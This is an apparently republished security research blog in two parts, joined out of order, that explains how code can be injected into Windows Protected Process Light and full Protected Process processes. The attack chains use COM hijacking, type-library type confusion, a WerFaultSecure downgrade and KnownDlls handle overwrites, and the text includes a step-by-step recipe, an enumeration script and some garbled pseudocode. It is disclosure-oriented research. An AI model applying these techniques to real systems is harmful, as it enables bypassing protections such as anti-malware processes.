Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels.WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version ofWerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:

/hEnable secure dump mode.
/pid {pid}Specify the Process ID to dump.
/tid {tid}Specify the Thread ID in the process to dump.
/file {handle}Specify a handle to a writable file for the unencrypted crash dump
/encfile {handle}Specify a handle to a writable file for the encrypted crash dump
/cancel {handle}Specify a handle to an event to indicate the dump should be cancelled
/type {flags}Specify MIMDUMPTYPE flags for call to MiniDumpWriteDump

This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecurewith COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.

Putting it All Together

There’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the methodCCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.

Unfortunately looking at the code this won’t work, a cut down version is shown below:HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId){ CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); IOSTaskCompletion* inf; HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));if(SUCCEEDED(hr)){   // Open process and disable PLM handling. }}The code passes the flag, CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way, the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:

  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of theLdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout andGetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ?can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements.

Wrapping Up

In conclusion to get arbitrary code execution inside a PP-WindowsTCB without administrator privileges process we can do the following:

  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invokingDoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Injecting Code into Windows Protected Processes using COM — Part 1

( Original text by James Forshaw )

At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” withAlex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.

Background on Windows Protected Processes

The origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model, a PP at one level can open all PP and PPL at the same signing level or below, however the reverse was not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:

Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL but it isn’t really important for this discussion.I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 12 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft’s PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed as a security bulletin. However Microsoft did fix the issue in the next major release on Windows (version 1803) by adding the following code to CI.DLL, the Kernel’s Code Integrity library:UNICODE_STRING g_BlockedDllsForPPL[]={

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize){

 UNICODE_STRING OriginalImageName;
 // Get the original filename from the image resources.
     Image, ImageSize,&OriginalImageName);
for(int i = 0; i < _countof(g_BlockedDllsForPPL);++i){
&OriginalImageName, TRUE)){
}The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit, if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.

Finding New Targets

The previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There’s so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OID for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs and that’ll give me a list of all executables to look for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignaturecmdlet for my NtObjectManager PowerShell module to extract this information.At this point I realized there was a problem with the approach of relying on the signing certificate, there’s a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Pathsuch as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis, just start protected every executable I could enumerate and query the protection level granted. I wrote the following script to test a single executable:Import-Module NtObjectManagerfunction Test-ProtectedProcess {[CmdletBinding()]   param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$FullName,[NtApiDotNet.PsProtectedType]$ProtectedType= 0,[NtApiDotNet.PsProtectedSigner]$ProtectedSigner= 0       )   BEGIN {$config= New-NtProcessConfig abc ProcessFlags ProtectedProcess `           ThreadFlags Suspended TerminateOnDispose `           ProtectedType $ProtectedType `           ProtectedSigner $ProtectedSigner}   PROCESS {$path= Get-NtFilePath $FullName       Write-Host $path       try {           Use-NtObject($p= New-NtProcess $pathConfig $config){$prot=$p.Process.Protection               $props= @{                   Path=$path;                   Type=$prot.Type;                   Signer=$prot.Signer;                   Level=$prot.Level.ToString(«X»);}$obj= New-Object –TypeName PSObject –Prop $props               Write-Output $obj}} catch {}}}When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks, for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is using the native process creation APIs it’s possible to start a DLL as main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.

PathSigning Level
C:\windows\system32\csrss.exeWindows TCB
C:\windows\system32\services.exeWindows TCB
C:\windows\system32\smss.exeWindows TCB
C:\windows\system32\werfaultsecure.exeWindows TCB
C:\windows\system32\wininit.exeWindows TCB

Injecting Arbitrary Code Into NGEN

After carefully reviewing the list of executables which run as PPL I settled ontrying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:

  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary, specifically it doesn’t meet my own criteria that I get the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL as shown below:NTSTATUS CiSetFileCache(HANDLE Handle,…){


if(FileObject->SharedWrite ||
(FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)){

 // Continue setting file cache.
}If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly, instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:C:\> NGEN install c:\some\binary.dllResults in the following command line being executed:MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe DA, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that  named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:void NGenWorkerEmbedding(HANDLE hPipe){
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE,&pStm);
 CoMarshalInterface(pStm,&IID_IClassFactory, &factory,                    MSHCTX_LOCAL,nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm,&length);
 WriteFile(hPipe, buffer, length);

 // Set event to synchronize with parent.

 // Pump message loop to handle COM calls.

 // …
}This code is not quite what I expected. Rather than using the named pipe for the entire communication channel it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance, normally you’d register the factory using CoRegisterClassObject but that would make it accessible to all processes at the same security level so instead by using marshaling the connection can be left private only to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET, we can determine if it is implemented in .NET by querying for its interfaces, for example we use the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the_Object interface. There’s only one interface implemented, ICorSvcBindToWorker so let’s dig into that interface to see if there’s anything we can exploit.Something caught my eye, in the screenshot there’s a HasTypeLib column, for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is rather than the interface’s proxy code being implemented using an predefined NDR byte stream it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is a normal proxy would be loaded as a DLL which means that it must meet the PPL signing level requirements; however a type library is just data so can be loaded into a PPL without any signing level violations.How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
[in] BSTR pRuntimeVersion,
[in] unsigned long ParentProcessID,
[in] BSTR pInterruptEventName,
[in] ICorSvcLogger* pCorSvcLogger,
[out] ICorSvcWorker** pCorSvcWorker);
};The single BindToRuntimeWorker takes 5 parameters, 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling to a pointer before calling the real function. For example imagine a simpler function, DoSomething which takes a single IUnknown pointer. The marshaling process looks like the following:

The operation of the method call is as follow:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from before issue 1112. For example if we modifying the type library to pass an integer instead of an interface pointer we get the following:

The operation of the marshal now changes as follows:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implement method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:struct FakeObject {
   BSTR FakeVTable;
};If we pass a pointer to a FakeObject instead of the interface pointer the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs so this will create a pointer to an object, which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.To fully exploit this we’d need to call a suitable method, probably running a ROP chain and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.

KnownDlls and Protected Processes.

In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator to PPL code injection as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation not section mapping as long as you can place an entry into KnownDlls you can load anything into a PPL even unsigned code.This doesn’t immediately seem that useful, we can’t write to KnownDlls without being an administrator, and even then without some clever tricks. However it’s worth looking at how a Known DLL is loaded to get an understanding on how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL.NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle){
 // If KnownDll directory handle not open then return error.

 OBJECT_ATTRIBUTES ObjectAttributes;

return NtOpenSection(SectionHandle,
}The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path, instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path as the lookup with be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:NTSTATUS LdrpInitializeProcess(){
 // …
 PPEB peb = // …
 // If a full protected process don’t use KnownDlls.
if(peb->IsProtectedProcess &&!peb->IsProtectedProcessLight){
   LdrpKnownDllDirectoryHandle =nullptr;
   OBJECT_ATTRIBUTES ObjectAttributes;
   RtlInitUnicodeString(&DirName, L»\\KnownDlls»);
   // Open KnownDlls directory.
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
}This code shouldn’t be that unexpected, the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in theLdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution resulting in a data only attack. As we can inherit any handles we like into the new PPL process we can setup an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG.All we need is a suitable primitive to write an arbitrary value, unfortunately while I could find methods which would cause an arbitrary write I couldn’t sufficiently control the value being written. In the end I used the following interface and method which was implemented on the object returned byICorSvcBindToWorker::BindToRuntimeWorker.interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
[in] OptimizationScenario scenario,
[in] ICorSvcLogger* pCorSvcLogger,
[out] long* pCanContinue);
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64 bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fakeKnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.

Elevating to PPL-Windows TCB

We can’t stop here, attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that generating a fake cached signed DLL should run in a PPL as well as Microsoft leaving a backdoor for PPL processes at any signing level I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE which will run as PPL Windows TCB we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing level in some way, perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.After discussing this a bit with Alex Ionescu I decided to put together a quick parser with information from Alex for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02), however for the system binary PowerShell couldn’t decode the enumeration and so just outputs the integer value of 66 which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. In the full trace artifacts of checking the full signature are shown such as enumerating catalog files, I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically, the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call toNtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL so that subsequent image mapping don’t need to recheck the signature. It’s possible to map an image section from a file with write access so we can reuse the same attack from Issue 1332 and replace the call toNtSetCachedSigningLevel with NtCreateSection and we can fake sign any DLL. It turned out that the call to set the file cache happened after the write check introducted to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597 which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB.


This blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this new found power? Actually not a great deal as a normal user but there are some parts of the OS, such as the Windows Store which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack such as CSRSS (through which you can certainly get kernel code execution) or attack Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows although it might be fixed in the next major version. Previously confirming Microsoft’s policy on fixing a particular security issue was based on precedent, however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria which, as shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd. I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix it’s still somewhat arbitrary. A secure feature is rarely secure in isolation, the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.